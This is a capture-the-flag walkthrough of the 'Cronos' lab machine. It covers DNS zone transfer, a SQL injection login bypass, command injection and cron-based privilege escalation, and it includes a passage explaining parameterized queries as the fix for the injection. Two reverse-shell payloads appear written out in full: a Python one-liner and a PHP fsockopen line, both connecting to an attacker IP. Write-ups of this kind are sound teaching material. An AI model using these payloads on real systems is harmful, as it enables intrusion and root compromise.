Cronos

Last updated 4 years ago

Overview

Initial foothold: SQL injection followed by command injection

Privilege escalation: scheduled task running as root

Enumeration

Starting with port scanning.

Port Scanning

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Cronos
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.13 (92%), Linux 3.2 - 4.9 (92%), Linux 3.12 (90%), Linux 3.13 or 4.2 (90%), Linux 3.16 (90%), Linux 3.16 - 4.6 (90%), Linux 3.18 (90%), Linux 3.8 - 3.11 (90%), Linux 4.2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Interestingly, port 53 is open, which tells us a DNS server is running.

Let's start with DNS enumeration.

DNS Enumeration

First, add the machine's hostname, cronos.htb, to the /etc/hosts file.

Now let's attempt a zone transfer.

A zone transfer can reveal potential subdomains of the site.

If you want to learn what a zone transfer is and why it matters, refer to the Acunetix article linked at the end.

Zone transfer using the dig command:

dig axfr cronos.htb @10.10.10.13

We got some subdomains for the hostname cronos.htb.

Let's add them to our /etc/hosts file.

That's all for DNS enumeration; we got the information we needed.

Web Enumeration

Let's visit the webpage.

A simple webpage was running.

We used directory brute-force but got nothing.

But from our previous DNS enumeration we had some subdomains.

Let's use them.

At admin.cronos we got a login page.

We don't have credentials, so let's try SQL injection on this login page.

We successfully logged in using:

Username : admin'or'1'='1; #

password : password

The above SQL injection logged us in as the admin user.
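To show why that username bypasses the login and how the query should have been written, here is an added example (not code from the original writeup or from the box). It assumes an in-memory SQLite table standing in for the admin panel's database, with a constructed stored credential.

```python
import sqlite3

PAYLOAD = "admin'or'1'='1; #"   # the username used on the login page above


def make_db():
    """Constructed stand-in for the admin panel's user table (not the box's data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    db.commit()
    return db


def vulnerable_login(db, username, password):
    """Concatenates user input into SQL, the defect the admin panel evidently had.

    With the payload the WHERE clause becomes
        username = 'admin' OR '1' = '1; #' AND password = '<anything>'
    AND binds tighter than OR, so the first comparison alone selects the admin
    row and the password is never checked.  Note that the '#' lands inside a
    string literal, so the bypass does not even rely on comment syntax.
    """
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return db.execute(query).fetchone() is not None


def safe_login(db, username, password):
    """Same lookup with bound parameters: the payload is compared as plain text."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", vulnerable_login(db, PAYLOAD, "password"))  # True
    print("parameterized:", safe_login(db, PAYLOAD, "password"))      # False
```

A real fix would also store a password hash rather than comparing the cleartext as this stand-in does.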

Exploitation

After logging in we got a webpage that runs traceroute.

There may be a possibility of command injection here, because the command is executed on the server side.

Let's try command injection.

Using the query 8.8.8.8;ls, the output of ls came back with the result.

Hence it is confirmed that there is a command injection vulnerability in the above webpage.

Let's use this to get a reverse shell.

Now use a reverse shell from the pentestmonkey cheat sheet.

Try the python reverse shell command:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.40",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Enter the above command in the textbox of the webpage and set up a listener on port 1234.

And we got the reverse shell.

Grab the user.txt file.

Privilege Escalation

After some enumeration we found a scheduled task running with root permissions whose script the user could overwrite.

Let's overwrite the file with our reverse shell code and set up a listener:

<?php
$sock=fsockopen("10.10.14.40",4444);exec("/bin/sh -i <&3 >&3 2>&3");

After some time the task executed and we got a root shell on port 4444.

That's all for this box

Good Bye :)

References:

Acunetix, "What are DNS zone transfers (AXFR)?"
pentestmonkey, "Reverse shell cheat sheet", http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet